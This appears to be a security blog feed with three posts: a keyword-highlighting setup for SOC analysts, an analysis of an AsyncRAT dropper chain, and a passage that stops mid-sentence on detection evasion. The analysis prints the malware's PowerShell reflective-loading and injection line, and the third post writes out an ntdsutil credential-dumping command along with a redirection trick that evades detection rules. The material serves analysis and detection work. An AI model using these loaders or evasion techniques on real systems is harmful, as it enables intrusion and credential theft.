tag:blogger.com,1999:blog-83411138118702465662024-02-19T07:38:27.588-08:00boredhackerblogI am posting because I'm bored. Unknownnoreply@blogger.comBlogger59125tag:blogger.com,1999:blog-8341113811870246566.post-90708531256386828382023-12-21T09:33:00.000-08:002023-12-21T09:33:37.936-08:00Speeding up report reading and security/SOC alert triaging by auto-highlighting keywords on webpages<p><b>Introduction:</b></p><p>If you're a security analyst or threat researcher, you may spend a lot of time reading reports/blogs or looking through SIEM. </p><p>It might get annoying to look for specific keywords/fields when looking through things, especially SIEM output. I know I had this issue.</p><p>I thought it'd be nice to have an extension that auto-highlighted things for me. While looking for such extension I found "Highlight This" extension. There are multiple extensions like that but this one took URL's of keywords so I thought it was perfect to pair it with Github as I may be adding/removing keywords.</p><p>Extension can be found here: <a href="https://chromewebstore.google.com/detail/highlight-this-finds-and/fgmbnmjmbjenlhbefngfibmjkpbcljaj?pli=1">https://chromewebstore.google.com/detail/highlight-this-finds-and/fgmbnmjmbjenlhbefngfibmjkpbcljaj?pli=1</a></p><p>Developers sites:</p><p><a href="https://highlightthis.net/">https://highlightthis.net/</a></p><p><a href="https://deboel.eu/">https://deboel.eu/</a></p><p>The extension developer does have an optional subscription service which gives you additional abilities. (<a href="https://highlightthis.net/Subscription.html">https://highlightthis.net/Subscription.html</a> ) </p><p><br /></p><p>Github repo I'm using this with is here: <a href="https://github.com/BoredHackerBlog/highlight_keywords">https://github.com/BoredHackerBlog/highlight_keywords</a></p><p>You should probably make your own list based on your needs.</p><p><b>Setup:</b></p><p>Download the extension and remove the default list. Activate subscription or activate free version (or try unlimited version for a limited time)</p><p>Add a new list. In my case, I'm pulling a list of keywords from Github so I can keep updating the list on Github in the future.</p><p>Add a list URL and customize all other options then start browsing!</p><p>I disabled "Only detect complete words" which can cause some bad highlighting, I'd recommend messing around and finding what works best for you.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgP1NDGBl8EtBklZbzEEWSSJsnQnD17RgmBNbPvcx440bZ7e1m2wkSXDemcWKkE7riZAIuFVnyMtO1_hn_w9TQ7wX4i37FbF4UQPaU7g2uPXN99dMG-WP9VFp8rkF-Dte3o4Y9nTDD9RDRgbw-9z5CN1_yWyKTdOcaUKPUDwWwJetD3LhyNlnVagGjqTlM" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="180" data-original-width="188" height="135" src="https://blogger.googleusercontent.com/img/a/AVvXsEgP1NDGBl8EtBklZbzEEWSSJsnQnD17RgmBNbPvcx440bZ7e1m2wkSXDemcWKkE7riZAIuFVnyMtO1_hn_w9TQ7wX4i37FbF4UQPaU7g2uPXN99dMG-WP9VFp8rkF-Dte3o4Y9nTDD9RDRgbw-9z5CN1_yWyKTdOcaUKPUDwWwJetD3LhyNlnVagGjqTlM=w141-h135" width="141" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhlLSo1sFAoI_suNnN5U-NpfpQt0RnX3UXyNhKmbBaHz2IylnwUv_I-_wUGVHU46J_2F_mcAtT30uj3zxgYg7OheWA_jEOs7UhspHuScIgJG8Q1hAUlmnVldGh9wzaThPYBxwsLWo8VMLTSJtsRwC65lg03ra6DERdkUO68XhmedWImy5ZPNd1dSvs0ong" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="738" data-original-width="940" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhlLSo1sFAoI_suNnN5U-NpfpQt0RnX3UXyNhKmbBaHz2IylnwUv_I-_wUGVHU46J_2F_mcAtT30uj3zxgYg7OheWA_jEOs7UhspHuScIgJG8Q1hAUlmnVldGh9wzaThPYBxwsLWo8VMLTSJtsRwC65lg03ra6DERdkUO68XhmedWImy5ZPNd1dSvs0ong" width="306" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhE6ferxbPjjOYs2zoA809x0Uz-7lD5OEErNSLITSq7KVXynh68yZyF_jSbX8TJAkZ__eyasFfP43dTPq4WV0UL-8VrTch23hLtK8f1mGr_3t3n1kbRajdNB73iGgxxT3rjyVQhSfyNppvMD9gSJU3Z_0qonp7DYga8bWU-evytYsUniCrCxYc-ID45VCA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="502" data-original-width="952" height="169" src="https://blogger.googleusercontent.com/img/a/AVvXsEhE6ferxbPjjOYs2zoA809x0Uz-7lD5OEErNSLITSq7KVXynh68yZyF_jSbX8TJAkZ__eyasFfP43dTPq4WV0UL-8VrTch23hLtK8f1mGr_3t3n1kbRajdNB73iGgxxT3rjyVQhSfyNppvMD9gSJU3Z_0qonp7DYga8bWU-evytYsUniCrCxYc-ID45VCA" width="320" /></a></div><br /><p></p><p>The extension also gives you a report of the things it detected:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh_ynrI1No2bFuuX6uwd-zQOXNWsh3EX8FxhiTvAuGsuX4phWjQc3ZUW0jSL_QovJKLZlV_geM4QsbrbzeymcDjCwOm8Nr_gTocLY97kNHbBtLIpkJjgbx5QTkgsqrdGrmSfyEMHNTJaw8C-7ogBLesCURPB5osIdgfCLEZ5u1P6diDidScLsnYZZzjNQo" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="544" data-original-width="856" height="203" src="https://blogger.googleusercontent.com/img/a/AVvXsEh_ynrI1No2bFuuX6uwd-zQOXNWsh3EX8FxhiTvAuGsuX4phWjQc3ZUW0jSL_QovJKLZlV_geM4QsbrbzeymcDjCwOm8Nr_gTocLY97kNHbBtLIpkJjgbx5QTkgsqrdGrmSfyEMHNTJaw8C-7ogBLesCURPB5osIdgfCLEZ5u1P6diDidScLsnYZZzjNQo" width="320" /></a></div><br /><br /><p></p><p><b>Results:</b></p><p>The DFIR Report page kinda looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhu3dmoZsuNlZiIGh7Fn7JOZQoh40LFDez3bec10TgfN2DZuCQrXxhMvkGUTtb9ThlETm-Oa3X5uA3AoQ84gmAI7Q-4VjvEeXtIuCjoGmzIdoh_KjU-dPKuml2LA8FK5EElX_57kteuZher23EvN57zkH8_ZYzV5f8oC1k7UB9MiUkcPaQX4z8YKZIRUgw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="2006" data-original-width="1972" height="449" src="https://blogger.googleusercontent.com/img/a/AVvXsEhu3dmoZsuNlZiIGh7Fn7JOZQoh40LFDez3bec10TgfN2DZuCQrXxhMvkGUTtb9ThlETm-Oa3X5uA3AoQ84gmAI7Q-4VjvEeXtIuCjoGmzIdoh_KjU-dPKuml2LA8FK5EElX_57kteuZher23EvN57zkH8_ZYzV5f8oC1k7UB9MiUkcPaQX4z8YKZIRUgw=w442-h449" width="442" /></a></div><br /><a href="https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/">https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/</a><p></p><p>Some XML sample logs</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhAokM1Ic3IDimTqRghSCBEkJS6xyVNBjoMLY-T7XWxSxyZmmqk6kcPqjrYwXmF-bZiC5wgcxXyyk_JnMuMC-QVYjsK0t0xFeAxym-rWv2gE0lzsLackwIVxEMMxggjTBbruaKIqopVm0wCaRkoqKU-ARbUoJ0dSn1oVyVhxyCBicnKpdlgh_NzchzuSOw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1508" data-original-width="1752" height="340" src="https://blogger.googleusercontent.com/img/a/AVvXsEhAokM1Ic3IDimTqRghSCBEkJS6xyVNBjoMLY-T7XWxSxyZmmqk6kcPqjrYwXmF-bZiC5wgcxXyyk_JnMuMC-QVYjsK0t0xFeAxym-rWv2gE0lzsLackwIVxEMMxggjTBbruaKIqopVm0wCaRkoqKU-ARbUoJ0dSn1oVyVhxyCBicnKpdlgh_NzchzuSOw=w395-h340" width="395" /></a></div><br /><a href="https://github.com/BoredHackerBlog/mitre_attack_xml_eventlogs/">https://github.com/BoredHackerBlog/mitre_attack_xml_eventlogs/</a><p></p><p><br /></p><p><br /></p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-37709955025433140052023-11-17T16:52:00.000-08:002023-11-17T16:52:11.706-08:00Quick sample analysis which ended up dropping asyncrat<p> I came across a sample that involving traffic to 91.92.242.28:222.</p><p>There is sandbox report here: <a href="https://tria.ge/231113-v9lgtaec41">https://tria.ge/231113-v9lgtaec41</a></p><p>I only looked at it because it involved so many files.</p><p>This is very quick and lazy analysis. I didn't spend time decompiling .NET.</p><p>At the time of analysis, the page has open directory.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiz-Rw8M0JEGchIPP0ZtuJ4h3R1216e0GsMawAQqS1yxq45zz7qb-5WmraoDypHJ23nLnJ5_CESERFtcMFRuLEEbj5ezKIKGuuR4PReQEesJJyaEeiPs-UgS9ij4_51tb4BucmBKziuPYQM3ibWXADLt57stMaiu8wEEW1c_XmiJ_YQw4du1l7_ATpu65M" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="266" data-original-width="962" height="88" src="https://blogger.googleusercontent.com/img/a/AVvXsEiz-Rw8M0JEGchIPP0ZtuJ4h3R1216e0GsMawAQqS1yxq45zz7qb-5WmraoDypHJ23nLnJ5_CESERFtcMFRuLEEbj5ezKIKGuuR4PReQEesJJyaEeiPs-UgS9ij4_51tb4BucmBKziuPYQM3ibWXADLt57stMaiu8wEEW1c_XmiJ_YQw4du1l7_ATpu65M" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;">There is a script and .jpg file which is a zip file.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjiL4BNvKGxFruOX31hs8IyQjScMD4FlxAY0hlcRlMj_WD0-44n2GrEigd7UUk2__hp34oKr1w973u0JnaF-ku2b5rG6E_mKz5uUoKtNy4f-KLZ-UC0bKBic_v3syH4F8tszDEtUqEdfGgapIszbw1Bj7Iuz2LD_WSQhhQaMGo33esSA5ah0QZHJSwUPr0" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="536" data-original-width="1006" height="170" src="https://blogger.googleusercontent.com/img/a/AVvXsEjiL4BNvKGxFruOX31hs8IyQjScMD4FlxAY0hlcRlMj_WD0-44n2GrEigd7UUk2__hp34oKr1w973u0JnaF-ku2b5rG6E_mKz5uUoKtNy4f-KLZ-UC0bKBic_v3syH4F8tszDEtUqEdfGgapIszbw1Bj7Iuz2LD_WSQhhQaMGo33esSA5ah0QZHJSwUPr0" width="320" /></a></div><br />Script downloads zip and extracts it to Public folder and initially starts f1.vbs file.<p></p><p>Zip files has several files:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh8EFEEwhY20ut2cTJAsq6kpOe9PhpuAIjKGIiZ5nYwG3lUnFuJYl2zbRK5c9gT94wZcc6Kun7nsSLnQUXtPXlyh8BxWN51HfQhGp3mb73ydSJdYmH3SifEKFgXolg3JpuohbXkvcSYikGVUT7hwECoGPAOQHdbhdB7rOwEo62lvx1k_r6Zv9RpR5gl51c" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="670" data-original-width="1252" height="266" src="https://blogger.googleusercontent.com/img/a/AVvXsEh8EFEEwhY20ut2cTJAsq6kpOe9PhpuAIjKGIiZ5nYwG3lUnFuJYl2zbRK5c9gT94wZcc6Kun7nsSLnQUXtPXlyh8BxWN51HfQhGp3mb73ydSJdYmH3SifEKFgXolg3JpuohbXkvcSYikGVUT7hwECoGPAOQHdbhdB7rOwEo62lvx1k_r6Zv9RpR5gl51c=w498-h266" width="498" /></a></div><br /><p></p><p>f1.vbs ends up launching f1.bat</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg-CF6BKu8M_1qGoDMJWgYxOkkrmXGTQVJr1C3eKKxRQLrLfDw2xB1x0wrc5-aKgk1NOluv8WBoA3sjlu1He90IlRp1oOZxC3FncLKphlZj2QBSnS9xXk0CHE31Quinv8rvnqkT0m8Tk-AepJfNbNIUiOGDUIl3wMKke87Oev1s1Q6Qbe2AzOQ5qRrr4MY" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="174" data-original-width="564" height="99" src="https://blogger.googleusercontent.com/img/a/AVvXsEg-CF6BKu8M_1qGoDMJWgYxOkkrmXGTQVJr1C3eKKxRQLrLfDw2xB1x0wrc5-aKgk1NOluv8WBoA3sjlu1He90IlRp1oOZxC3FncLKphlZj2QBSnS9xXk0CHE31Quinv8rvnqkT0m8Tk-AepJfNbNIUiOGDUIl3wMKke87Oev1s1Q6Qbe2AzOQ5qRrr4MY" width="320" /></a></div><br />f1.bat ends up launching powershell and f1.ps1<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjnNGTAxxF0fCSCnVWZp6M4gjTPGGOzKS4q5I6WuBO3pW8V1ivZR9u9aDfpCL0zz_dJHgy6GtdSOi82XwHYIBgox1lb5zNoaUYB1SYkelSkU0byTejA7IUd9Y6P2_rq-KXxb0oTEClP0zCl_Bc_KtLZxFjl9u8bGZwowmzwS7ZKhdKCPbxu6R3KFwT3dTk" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="312" data-original-width="950" height="105" src="https://blogger.googleusercontent.com/img/a/AVvXsEjnNGTAxxF0fCSCnVWZp6M4gjTPGGOzKS4q5I6WuBO3pW8V1ivZR9u9aDfpCL0zz_dJHgy6GtdSOi82XwHYIBgox1lb5zNoaUYB1SYkelSkU0byTejA7IUd9Y6P2_rq-KXxb0oTEClP0zCl_Bc_KtLZxFjl9u8bGZwowmzwS7ZKhdKCPbxu6R3KFwT3dTk" width="320" /></a></div><br />Powershell sets up a scheduled task to launch tron.vbs<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh5Pk9hgUYC5cbM2zqbThn2i7nKTOimCtS0q-m-MTsy1yY6KNiBkh86H8w7EewdhJjPEemnEA6NVzcSjRzh_9nHWnlM4KxpfbpCM7jeoQ36PmEIce5PtPVcUt0X_U_-Ex61vheLIdKNmnb97Qoo5G0CxsgjIIlY7y-Os6IHnhZXR_As4yWuTdOPLJkDqaM" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="494" data-original-width="1214" height="205" src="https://blogger.googleusercontent.com/img/a/AVvXsEh5Pk9hgUYC5cbM2zqbThn2i7nKTOimCtS0q-m-MTsy1yY6KNiBkh86H8w7EewdhJjPEemnEA6NVzcSjRzh_9nHWnlM4KxpfbpCM7jeoQ36PmEIce5PtPVcUt0X_U_-Ex61vheLIdKNmnb97Qoo5G0CxsgjIIlY7y-Os6IHnhZXR_As4yWuTdOPLJkDqaM=w504-h205" width="504" /></a></div><br />tron.vbs launches tron.bat<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjAUokm38dn2e0Ktkezzdc1O4Dr7--8Z7jDk0IXC5jBnlBwHoMkEpQJ-LNuiHKG2dcJRGivRXhtCmxEaJJRc8NKdus7-BDy9Uaa6jf3OAba-sdyiJlyfBaVjjWPq1nluPcCaQSwiC7AB6OvBRfP5tzVSGvtvvpx_S7W5zL_YenRXagdj7zwTkt3W1pd-To" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="144" data-original-width="576" height="80" src="https://blogger.googleusercontent.com/img/a/AVvXsEjAUokm38dn2e0Ktkezzdc1O4Dr7--8Z7jDk0IXC5jBnlBwHoMkEpQJ-LNuiHKG2dcJRGivRXhtCmxEaJJRc8NKdus7-BDy9Uaa6jf3OAba-sdyiJlyfBaVjjWPq1nluPcCaQSwiC7AB6OvBRfP5tzVSGvtvvpx_S7W5zL_YenRXagdj7zwTkt3W1pd-To" width="320" /></a></div><br />tron.bat launches tron.ps1<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjYkdNbmNDss5secpdO3A5GLF-jWFBQrIpmzpQ6QqyErMrANBhFzd_RwPvhOiuL4d6pdfnC2BMcJZ7_BpejfQVlfsr4ypbXcTA560qgilyi39e5CmTRjcT92X2xy5AkKglAQ0M-86tMniX-pHo7_AfCPNoHUgh2dpTrNq4qSR-y0URUCWnoDfDcd6ne8a0" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="310" data-original-width="912" height="109" src="https://blogger.googleusercontent.com/img/a/AVvXsEjYkdNbmNDss5secpdO3A5GLF-jWFBQrIpmzpQ6QqyErMrANBhFzd_RwPvhOiuL4d6pdfnC2BMcJZ7_BpejfQVlfsr4ypbXcTA560qgilyi39e5CmTRjcT92X2xy5AkKglAQ0M-86tMniX-pHo7_AfCPNoHUgh2dpTrNq4qSR-y0URUCWnoDfDcd6ne8a0" width="320" /></a></div><br />This is where things are kinda interesting (relative to all the stuff above...)<p></p><p>Powershell has functions to decode/deofuscate the other files</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhq_wpK_2ovlBdARRcrT47o9wANbbzqCvcFbnczmoY-uCNbye8Kshfs9iDJJkv-GlC5MI4ehfkoY1s4l8aB2T_AkKoxRzmM3Ab6J-v8VJGRJs74anSPTlJVvg23owVWgGri3UGz6bl3GUDCV7ujR8o5njycCUnT3p6VBN3pI1RDidE5-jB5Pr9FV6Lc1A4" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="536" data-original-width="1150" height="248" src="https://blogger.googleusercontent.com/img/a/AVvXsEhq_wpK_2ovlBdARRcrT47o9wANbbzqCvcFbnczmoY-uCNbye8Kshfs9iDJJkv-GlC5MI4ehfkoY1s4l8aB2T_AkKoxRzmM3Ab6J-v8VJGRJs74anSPTlJVvg23owVWgGri3UGz6bl3GUDCV7ujR8o5njycCUnT3p6VBN3pI1RDidE5-jB5Pr9FV6Lc1A4=w532-h248" width="532" /></a></div><br />If we look at runpe and msg file, which the script next loads, it's pretty easy to see partial MZ header<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEimbow3o_18-MGcd46ocJ9ZIrCvZC_i_2PdWgZFyyBfob2z83GXLHbaQnld502XEny8P9nmRm0I3R0DwvlXzQ7YF6_DvMj6w7h7bovjjojUBbJE3jRExXOYFZ9JWcPHCy-Q3PQhr0mh-kqT_Pj21EfbAOCB0PaIxodTUsqsewcaN8qJ-ZsysF8OhoXQuYY" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="214" data-original-width="1932" height="74" src="https://blogger.googleusercontent.com/img/a/AVvXsEimbow3o_18-MGcd46ocJ9ZIrCvZC_i_2PdWgZFyyBfob2z83GXLHbaQnld502XEny8P9nmRm0I3R0DwvlXzQ7YF6_DvMj6w7h7bovjjojUBbJE3jRExXOYFZ9JWcPHCy-Q3PQhr0mh-kqT_Pj21EfbAOCB0PaIxodTUsqsewcaN8qJ-ZsysF8OhoXQuYY=w673-h74" width="673" /></a></div><br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjRBsmy17Av71g5O-kSG2HxUlRDcBCw3MPRfhRQt6irxpfMGfqaCDHyeJx03GlOXj84WGBB0oX8Xa8P-ib2rizsrrNWxfRJ_ddiSYY9cb-6tMkWCi3T_ma4S5UPFPCFmH1TunuP-6mdtMJ5d5ncgKTGJXElcQDHNiO5uN64oHqhPz8D31BeNXmf2XdkOmw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="108" data-original-width="274" height="126" src="https://blogger.googleusercontent.com/img/a/AVvXsEjRBsmy17Av71g5O-kSG2HxUlRDcBCw3MPRfhRQt6irxpfMGfqaCDHyeJx03GlOXj84WGBB0oX8Xa8P-ib2rizsrrNWxfRJ_ddiSYY9cb-6tMkWCi3T_ma4S5UPFPCFmH1TunuP-6mdtMJ5d5ncgKTGJXElcQDHNiO5uN64oHqhPz8D31BeNXmf2XdkOmw" width="320" /></a></div><br />Next it loads text from files for execution<p></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEggfrd72FzCEsWVbLilp-ZJUaPDldo05BB-jRxj_7Jm3kKO4r3j1dTd18vagaiI7wi6WBjzJldZEsDGDR9kf9MbhDQ2HLENsKQusP34MEVRQ5uJ4D9GcjS7tnuwfLBKp50GR4POvgjwN72uy-s6qMQSIPxJWI8VuK08qjJzWbP_U3KUo6nKFekWGlC9o9Q" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="540" data-original-width="1676" height="186" src="https://blogger.googleusercontent.com/img/a/AVvXsEggfrd72FzCEsWVbLilp-ZJUaPDldo05BB-jRxj_7Jm3kKO4r3j1dTd18vagaiI7wi6WBjzJldZEsDGDR9kf9MbhDQ2HLENsKQusP34MEVRQ5uJ4D9GcjS7tnuwfLBKp50GR4POvgjwN72uy-s6qMQSIPxJWI8VuK08qjJzWbP_U3KUo6nKFekWGlC9o9Q=w578-h186" width="578" /></a></div><br /><p></p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg23uRlvHODmpBkffQ90bdgm3-k7qEuJADqQRsvtudOyHbq0yXSvLPBFB_ZchcuH8p2cU_tA4geFKubG-EgyF48TCkKKMrBHtWZKgYaY30HWU9_7h7sueTif4mJMwBwtAXLq723lcqukLJwFzom2RPFsAbDlXfpnzBzcKabNzmZi8aNWO7Yy8shVRmK3sQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="478" data-original-width="1228" height="230" src="https://blogger.googleusercontent.com/img/a/AVvXsEg23uRlvHODmpBkffQ90bdgm3-k7qEuJADqQRsvtudOyHbq0yXSvLPBFB_ZchcuH8p2cU_tA4geFKubG-EgyF48TCkKKMrBHtWZKgYaY30HWU9_7h7sueTif4mJMwBwtAXLq723lcqukLJwFzom2RPFsAbDlXfpnzBzcKabNzmZi8aNWO7Yy8shVRmK3sQ=w589-h230" width="589" /></a></div><br /><br /></div>It would finally run this:<br /><p></p><p>$Coment is runpe.txt data and $JR is msg.txt data.</p><p>$u = [Reflection.Assembly]</p><p>$u::Load($Coment).GetType(NewPE2.PE).GetMethod(Execute).Invoke($null,[object[]] (C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,$null,$JR,$true))</p><p>https://learn.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load?view=net-7.0 </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj-dHWTZj65Ng0qEqAGzYhJVqNm5fuTnKzuT8yvlZ49G31_1Ef7UnSZw7vA-Bk7E9gHsAIXCYkXZYL90BxquBqzDd7gm6i1jdoMRoT90OMob2XFvEHNAANt0XmHSrzI-IwIHbjVpO9OJ_g-LNkCIZyCdMS88d1lrVeypqJ_qQr79N73D-e1udFaBCXc4OQ" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="190" data-original-width="908" height="115" src="https://blogger.googleusercontent.com/img/a/AVvXsEj-dHWTZj65Ng0qEqAGzYhJVqNm5fuTnKzuT8yvlZ49G31_1Ef7UnSZw7vA-Bk7E9gHsAIXCYkXZYL90BxquBqzDd7gm6i1jdoMRoT90OMob2XFvEHNAANt0XmHSrzI-IwIHbjVpO9OJ_g-LNkCIZyCdMS88d1lrVeypqJ_qQr79N73D-e1udFaBCXc4OQ=w551-h115" width="551" /></a></div><br />I saved the PE files after they were decoded/deobfuscated. <p></p><p>msg was asyncrat</p><p><a href="https://www.virustotal.com/gui/file/a11cc3de26de3241be5f24c8c0d3e44b16e4fee35b8a306026e86590ccd8a0c1?nocache=1">https://www.virustotal.com/gui/file/a11cc3de26de3241be5f24c8c0d3e44b16e4fee35b8a306026e86590ccd8a0c1?nocache=1</a></p><p>runpe was injector</p><p><a href="https://www.virustotal.com/gui/file/a550a06a66009040462411867fce966b24499290d08bac8b3596f715cd5c6596?nocache=1">https://www.virustotal.com/gui/file/a550a06a66009040462411867fce966b24499290d08bac8b3596f715cd5c6596?nocache=1</a></p><p><br /></p><p>So many files and so much execution just to drop asyncrat.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjXPMV8gdMB71I3GWIupmvgXJ5yl-wfV1sZSIrdFKLwFj5VyFG7w23mIZi6mB6BPEiT-SYwhE0V3T9RohDC9XTQ7jgFeCgc5GM451JQ_tYKrcwOb0KMk6Jj6pvhM3OWyPZzQsrx_NYs3C_coWlbM-1OcMWUHPc5gHRvPeWbuZvVHXv17bIRMPMiP5RbTao" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="626" data-original-width="834" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEjXPMV8gdMB71I3GWIupmvgXJ5yl-wfV1sZSIrdFKLwFj5VyFG7w23mIZi6mB6BPEiT-SYwhE0V3T9RohDC9XTQ7jgFeCgc5GM451JQ_tYKrcwOb0KMk6Jj6pvhM3OWyPZzQsrx_NYs3C_coWlbM-1OcMWUHPc5gHRvPeWbuZvVHXv17bIRMPMiP5RbTao" width="320" /></a></div><br /><br /><p></p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-90016985938516692582023-10-22T11:33:00.001-07:002023-10-22T11:33:39.546-07:00Using command line redirection and DLL ordinals to potentially bypass detections<p>I came across this during a pentest. The techniques mentioned here are not new and there are already some detections in place but I don't see these techniques being used regularly...</p><p><br /></p><p><b>Command redirection</b></p><p>The concept of redirection for command line is well known and is commonly used. (This should provide more info: <a href="https://ss64.com/nt/syntax-redirection.html">https://ss64.com/nt/syntax-redirection.html</a>) </p><p>For example, you can do `COMMAND > output.txt` to save output from a command.</p><p>There is also `<` where you can pass input from a file to an interactive binary or executable.</p><p>Additionally, you can also do | to pass input to a binary. </p><p>Here are examples:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHIr-GxtdpMRhEf29-VoqFsbxf6iQ4oi60grHza7hIx_LkZyIYmxHxI47cdO0_9zzNNzt3a6AYeTnUixobe7EC8xXIm0qPUlCtwohZDy7BDdXG05uCuhbFz8Q_nHmTqqrXg3-Yx_sM95_Rw7p3Cs2cYWF-w5LU03W6SwcTM0LCHDeSHlkYcqMjLiO3J9w/s1066/Pasted_Image_10_22_23__1_49_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="860" data-original-width="1066" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHIr-GxtdpMRhEf29-VoqFsbxf6iQ4oi60grHza7hIx_LkZyIYmxHxI47cdO0_9zzNNzt3a6AYeTnUixobe7EC8xXIm0qPUlCtwohZDy7BDdXG05uCuhbFz8Q_nHmTqqrXg3-Yx_sM95_Rw7p3Cs2cYWF-w5LU03W6SwcTM0LCHDeSHlkYcqMjLiO3J9w/w389-h314/Pasted_Image_10_22_23__1_49_PM.png" width="389" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB2QyW3j6NXIfATgEhVGaOMxoxTkQK1TnXaVyZwQlhQemlTZsReYRSNpJxPrI1FuEVWeiBTuRVZgxamZ7lTVjK-PJN_AY__-bqEsn0jhUPnK6jv5ilAhM2UG7KRQQdHUsh8mT4tIrlIkRjZ74AeB0Wo82_4ef2qXn31CfEksFoStsSzrCbsRnFF-B9c64/s1130/Pasted_Image_10_22_23__1_53_PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="862" data-original-width="1130" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB2QyW3j6NXIfATgEhVGaOMxoxTkQK1TnXaVyZwQlhQemlTZsReYRSNpJxPrI1FuEVWeiBTuRVZgxamZ7lTVjK-PJN_AY__-bqEsn0jhUPnK6jv5ilAhM2UG7KRQQdHUsh8mT4tIrlIkRjZ74AeB0Wo82_4ef2qXn31CfEksFoStsSzrCbsRnFF-B9c64/w408-h311/Pasted_Image_10_22_23__1_53_PM.png" width="408" /></a></div><br /><p>The redirection technique using < is what I observed during an alert from a pentest.</p><p>Essentially, the attacker added their commands for ntds dump to a text file then passed the text file to ntdsutil.exe using <. so `<span style="font-family: courier;">ntdsutil < filewithcommands.txt</span>`</p><p>Usually, this is what you may see: <span style="font-family: courier;">ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q</span></p><p><a href="https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration">https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration</a> </p><p>If your detections are looking specifically for command w/ "<span style="font-family: courier;">ac i ntds</span>" and "<span style="font-family: courier;">create full</span>" and the attacker uses the redirection technique, you may miss a detection.</p><p>There are sigma rules here that would and wouldn't miss this: <a href="https://detection.fyi/search/?query=ntdsutil">https://detection.fyi/search/?query=ntdsutil</a></p><p>I just thought it was interesting for the attacker to write commands to text file and dump ntds.dit this way since I've never seen it being done like that.</p><p><br /></p><p><b>Rundll32 w/ ordinals</b></p><p>This once again is not new. If you've done 